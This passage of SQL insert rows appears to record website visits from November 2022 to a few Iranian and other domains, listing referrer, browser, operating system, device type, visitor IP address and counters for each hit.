(25249,'2022-11-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25250,'2022-11-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(25251,'2022-11-01','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','196.18.225.102','000',0,10,0),
(25252,'2022-11-01','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25253,'2022-11-01','http://ictbank.ir/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','121.4.79.217','000',0,3,0),
(25254,'2022-11-01','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.168','000',0,1,0),
(25255,'2022-11-01','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.189','000',0,2,0),
(25256,'2022-11-01','http://ns11.design-arena.ir/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','124.221.186.82','000',0,5,0),
(25257,'2022-11-01','http://wikisonnati.com','Chrome','Windows','44.0.2403.155','desktop','Unknown','','23.254.113.106','000',0,2,0),
(25258,'2022-11-02','http://ictbank.ir/blog','Firefox','Windows','3.6.13','desktop','Unknown','','208.80.194.126','000',0,4,0),
(25259,'2022-11-02','http://ns11.design-arena.ir/blog','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.21','000',0,2,0),
(25260,'2022-11-02','http://ns11.design-arena.ir/blog/','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.23','000',0,1,0),
(25261,'2022-11-02','http://ictbank.ir/blog','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.20','000',0,1,0),
(25262,'2022-11-02','http://ictbank.ir/blog','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.22','000',0,1,0),
(25263,'2022-11-02','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','51.255.144.79','000',0,2,0),
(25264,'2022-11-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25265,'2022-11-02','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,3,0),
(25266,'2022-11-02','http://ictbank.ir/blog','Chrome','Windows','34.0.1847.116','desktop','Unknown','','178.62.82.141','000',0,1,0),
(25267,'2022-11-02','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(25268,'2022-11-02','http://www.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(25269,'2022-11-02','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.49.169','000',0,1,0),
(25270,'2022-11-02','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.33.65','000',0,1,0),
(25271,'2022-11-02','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.122.184','000',0,1,0),
(25272,'2022-11-02','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','3.68.50.38','000',0,1,0),
(25273,'2022-11-02','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','165.227.183.82','000',0,2,0),
(25274,'2022-11-02','http://mail.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.18','000',0,1,0),
(25275,'2022-11-02','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25276,'2022-11-02','http://www.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','128.14.209.250','000',0,2,0),
(25277,'2022-11-02','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(25278,'2022-11-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25279,'2022-11-02','https://www.bing.com/','Chrome','Windows','106.0.0.0','desktop','Unknown','','72.28.192.222','000',0,1,0),
(25280,'2022-11-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(25281,'2022-11-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.164','000',0,1,0),
(25282,'2022-11-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25283,'2022-11-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25284,'2022-11-02','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','89.248.165.169','000',0,2,0),
(25285,'2022-11-02','http://ictbank.ir/blog','Chrome','Android','34.0.1847.114','mobile:smart','Nexus 4','','59.63.149.63','000',0,1,0),
(25286,'2022-11-02','http://ictbank.ir/blog','Chrome','Windows','99.0.4844.84','desktop','Unknown','','5.188.62.26','000',0,2,0),
(25287,'2022-11-02','http://ictbank.ir','Internet Explorer','Windows','10.0','desktop','','','23.250.41.212','000',0,1,0),
(25288,'2022-11-02','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(25289,'2022-11-03','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25290,'2022-11-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.66','000',0,2,0),
(25291,'2022-11-03','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','159.89.105.73','000',0,2,0),
(25292,'2022-11-03','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25293,'2022-11-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.57','000',0,2,0),
(25294,'2022-11-03','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(25295,'2022-11-03','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.90.160.122','000',0,2,0),
(25296,'2022-11-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,2,0),
(25297,'2022-11-03','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.122','000',0,2,0),
(25298,'2022-11-03','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25299,'2022-11-03','http://ictbank.ir/blog','Chrome','Linux','106.0.5249.119','desktop','Unknown','','44.236.207.248','000',0,1,0),
(25300,'2022-11-03','http://ictbank.ir/blog','Edge','Windows','107.0.1418.26','desktop','Unknown','','5.126.150.62','000',0,2,0),
(25301,'2022-11-03','http://design-arena.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','204.48.26.148','000',0,2,0),
(25302,'2022-11-03','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(25303,'2022-11-03','http://ictbank.ir/blog','Safari','OS X','15.5','desktop','Macintosh','','5.116.145.139','000',0,1,0),
(25306,'2022-11-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.32.144.195','000',0,1,0),
(25307,'2022-11-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.63.100','000',0,1,0),
(25308,'2022-11-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25309,'2022-11-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25310,'2022-11-03','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','67.205.56.207','000',0,1,0),
(25311,'2022-11-03','http://wikisonnati.com','Chrome','OS X','48.0.2564.103','desktop','Macintosh','','45.192.156.136','000',0,4,0),
(25312,'2022-11-03','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25313,'2022-11-03','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','89.248.165.169','000',0,2,0),
(25314,'2022-11-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25315,'2022-11-04','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(25316,'2022-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(25317,'2022-11-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25318,'2022-11-04','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','54.37.81.45','000',0,2,0),
(25319,'2022-11-04','https://www.bing.com','Chrome','Windows','37.0.2049.0','desktop','Unknown','','46.101.157.99','000',0,1,0),
(25320,'2022-11-04','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(25321,'2022-11-04','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(25322,'2022-11-04','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25323,'2022-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,4,0),
(25324,'2022-11-04','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.210','000',0,2,0),
(25325,'2022-11-04','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','212.71.235.78','000',0,2,0),
(25326,'2022-11-04','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25327,'2022-11-04','http://design-arena.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','195.134.67.81','000',0,2,0),
(25328,'2022-11-04','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','93.157.129.118','000',0,1,0),
(25329,'2022-11-04','http://ictbank.ir/blog','Chrome','OS X','106.0.0.0','desktop','Macintosh','','5.116.45.82','000',0,5,0),
(25330,'2022-11-04','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25331,'2022-11-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25332,'2022-11-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
(25333,'2022-11-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.229.203','000',0,1,0),
(25334,'2022-11-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25335,'2022-11-04','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25336,'2022-11-04','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.172','000',0,1,0),
(25337,'2022-11-04','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','149.202.169.126','000',0,2,0),
(25338,'2022-11-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25339,'2022-11-04','http://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','154.13.251.141','000',0,1,0),
(25340,'2022-11-05','http://ictbank.ir/blog','Chrome','Windows','70.0.3538.77','desktop','Unknown','','134.209.200.146','000',0,2,0),
(25341,'2022-11-05','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(25342,'2022-11-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','37.49.230.15','000',0,2,0),
(25343,'2022-11-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(25344,'2022-11-05','https://www.google.com/','Chrome','Linux','105.0.0.0','desktop','Unknown','','87.231.145.52','000',0,1,0),
(25345,'2022-11-05','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(25346,'2022-11-05','http://ictbank.ir/blog','Firefox','Ubuntu','3.6.13','desktop','Unknown','','208.80.194.126','000',0,3,0),
(25347,'2022-11-05','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25348,'2022-11-05','http://google.com','Firefox','Windows','40.0','desktop','Unknown','','52.28.166.120','000',0,1,0),
(25349,'2022-11-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,4,0),
(25350,'2022-11-05','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25351,'2022-11-05','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.74','000',0,2,0),
(25352,'2022-11-05','http://ictbank.ir/blog','Internet Explorer','Windows','11.0','desktop','Unknown','','99.102.162.158','000',0,6,0),
(25353,'2022-11-05','http://ictbank.ir/blog','Chrome','Linux','58.0.3029.110','desktop','Unknown','','3.87.139.238','000',0,1,0),
(25354,'2022-11-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25355,'2022-11-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(25356,'2022-11-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','46.101.23.201','000',0,1,0),
(25357,'2022-11-05','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','206.189.115.231','000',0,1,0),
(25358,'2022-11-05','http://ictbank.ir/blog','Firefox','Windows','4.0.1','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25359,'2022-11-05','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25360,'2022-11-05','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(25361,'2022-11-05','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','191.102.143.163','000',0,2,0),
(25362,'2022-11-05','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.67.165','000',0,1,0),
(25363,'2022-11-05','http://ictbank.ir/blog','Yandex Browser','Windows','22.7.0','desktop','Unknown','','45.125.245.213','000',0,10,0),
(25364,'2022-11-05','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(25365,'2022-11-06','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25366,'2022-11-06','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(25367,'2022-11-06','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25368,'2022-11-06','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(25369,'2022-11-06','http://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','20.232.147.68','000',0,4,0),
(25370,'2022-11-06','http://ictbank.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','174.140.244.149','000',0,2,0),
(25371,'2022-11-06','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','89.248.165.169','000',0,2,0),
(25372,'2022-11-06','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,4,0),
(25373,'2022-11-06','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','212.102.55.113','000',0,20,0),
(25374,'2022-11-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25375,'2022-11-06','http://45.92.94.221/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.165','000',0,1,0),
(25376,'2022-11-06','http://45.92.94.221/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.193','000',0,1,0),
(25377,'2022-11-06','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25378,'2022-11-06','http://ictbank.ir/blog/','Chrome','Windows','90.0.4400.8','desktop','Unknown','','136.169.243.169','000',0,6,0),
(25379,'2022-11-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','198.199.125.97','000',0,1,0),
(25380,'2022-11-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(25381,'2022-11-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(25382,'2022-11-06','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25383,'2022-11-06','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.33.65','000',0,3,0),
(25384,'2022-11-06','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.112','000',0,1,0),
(25385,'2022-11-06','http://www.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(25386,'2022-11-06','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(25387,'2022-11-06','http://ictbank.ir','Iceweasel','Linux','36.0','desktop','Unknown','','23.254.113.106','000',0,1,0),
(25388,'2022-11-06','http://design-arena.ir/blog','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.121','000',0,1,0),
(25389,'2022-11-06','http://design-arena.ir/blog/','Firefox','Windows','104.0','desktop','Unknown','','130.255.166.26','000',0,1,0),
(25390,'2022-11-06','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.43','000',0,2,0),
(25391,'2022-11-06','http://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.98','000',0,1,0),
(25392,'2022-11-06','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25393,'2022-11-06','http://ictbank.ir/blog','Chrome','Windows','12.0.742.91','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25394,'2022-11-07','http://design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.224.141','000',0,3,0),
(25395,'2022-11-07','http://45.92.94.221/blog','Chrome','Linux','102.0.4997.0','desktop','Unknown','','43.246.208.2','000',0,1,0),
(25396,'2022-11-07','http://45.92.94.221/blog','Safari','iOS','8.0','mobile:smart','iPhone','','103.43.19.20','000',0,2,0),
(25397,'2022-11-07','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','44.211.186.204','000',0,1,0),
(25398,'2022-11-07','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25399,'2022-11-07','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,16,0),
(25400,'2022-11-07','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.122','000',0,3,0),
(25401,'2022-11-07','http://wikisonnati.com','Firefox','Windows','43.0','desktop','Unknown','','188.74.168.103','000',0,2,0),
(25402,'2022-11-07','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.37','000',0,1,0),
(25403,'2022-11-07','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(25404,'2022-11-07','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25405,'2022-11-07','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.192.138','000',0,2,0),
(25406,'2022-11-07','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(25407,'2022-11-07','http://www.ictbank.ir/blog','Firefox','Windows','106.0','desktop','Unknown','','137.74.24.99','000',0,2,0),
(25408,'2022-11-07','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','179.43.159.197','000',0,1,0),
(25409,'2022-11-07','http://ictbank.ir','WebKit Nightly Build','Windows','Unknown','desktop','Unknown','','193.23.253.75','000',0,3,0),
(25410,'2022-11-07','http://ictbank.ir/blog','Chrome','Linux','107.0.5304.88','desktop','Unknown','','100.21.218.158','000',0,1,0),
(25411,'2022-11-07','http://wikisonnati.com/blog','Opera','Windows','84.0.4316.14','desktop','Unknown','','93.158.91.204','000',0,1,0),
(25412,'2022-11-07','http://wikisonnati.com/blog/','Opera','Windows','84.0.4316.14','desktop','Unknown','','93.158.91.205','000',0,1,0),
(25413,'2022-11-07','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','185.220.100.254','000',0,1,0),
(25414,'2022-11-07','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','82.221.131.71','000',0,1,0),
(25415,'2022-11-07','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,5,0),
(25416,'2022-11-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.164','000',0,2,0),
(25417,'2022-11-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','46.101.23.201','000',0,1,0),
(25418,'2022-11-07','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.184.130','000',0,1,0),
(25419,'2022-11-07','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(25420,'2022-11-07','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(25421,'2022-11-07','http://www.ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.41.193','000',0,1,0),
(25422,'2022-11-07','http://45.92.94.221/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.34.187','000',0,2,0),
(25423,'2022-11-07','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.170','000',0,2,0),
(25424,'2022-11-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(25425,'2022-11-08','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.121','000',0,4,0),
(25426,'2022-11-08','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(25427,'2022-11-08','http://45.92.94.221/blog','Chrome','Linux','86.0.4','desktop','Unknown','','36.156.28.133','000',0,1,0),
(25428,'2022-11-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(25429,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','89.187.162.176','000',0,1,0),
(25430,'2022-11-08','http://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','47.105.45.128','000',0,2,0),
(25431,'2022-11-08','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.26','000',0,2,0),
(25432,'2022-11-08','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,4,0),
(25433,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','51.254.199.11','000',0,2,0),
(25434,'2022-11-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25435,'2022-11-08','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.58','000',0,121,0),
(25436,'2022-11-08','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','193.32.127.155','000',0,1,0),
(25437,'2022-11-08','https://www.google.com','Chrome','Windows','97.0.4692.99','desktop','Unknown','','185.142.239.49','000',0,1,0),
(25438,'2022-11-08','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,2,0),
(25439,'2022-11-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25440,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','193.202.110.29','000',0,3,0),
(25441,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','23.229.113.138','000',0,3,0),
(25442,'2022-11-08','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.46','000',0,2,0),
(25443,'2022-11-08','http://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','184.168.116.113','000',0,5,0),
(25444,'2022-11-08','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25445,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','90.0.4430.212','desktop','Unknown','','47.103.68.101','000',0,5,0),
(25446,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','45.32.113.107','000',0,3,0),
(25447,'2022-11-08','http://ictbank.ir/blog','Chrome','Android','91.0.4472.114','mobile:smart','Stylo 5','','216.137.180.105','000',0,5,0),
(25448,'2022-11-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.12.130','000',0,1,0),
(25449,'2022-11-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(25450,'2022-11-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(25451,'2022-11-08','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25452,'2022-11-08','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(25453,'2022-11-08','http://wikisonnati.com','Firefox','Windows','13.0.1','desktop','Unknown','','45.192.145.8','000',0,4,0),
(25454,'2022-11-08','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','138.68.5.135','000',0,2,0),
(25455,'2022-11-08','http://ictbank.ir/blog','Chrome','Windows','91.0.4472.114','desktop','Unknown','','176.31.65.104','000',0,5,0),
(25456,'2022-11-08','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','89.248.165.169','000',0,1,0),
(25457,'2022-11-09','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(25458,'2022-11-09','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','187.113.69.173','000',0,1,0),
(25459,'2022-11-09','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,6,0),
(25460,'2022-11-09','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25461,'2022-11-09','https://www.google.com/','Chrome','Windows','107.0.0.0','desktop','Unknown','','14.36.152.38','000',0,1,0),
(25462,'2022-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(25463,'2022-11-09','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','45.116.156.252','000',0,4,0),
(25464,'2022-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,3,0),
(25465,'2022-11-09','http://ictbank.ir/blog','Chrome','Windows','57.0.3102.106','desktop','Unknown','','54.159.55.112','000',0,2,0),
(25466,'2022-11-09','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','85.202.194.99','000',0,2,0),
(25467,'2022-11-09','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,4,0),
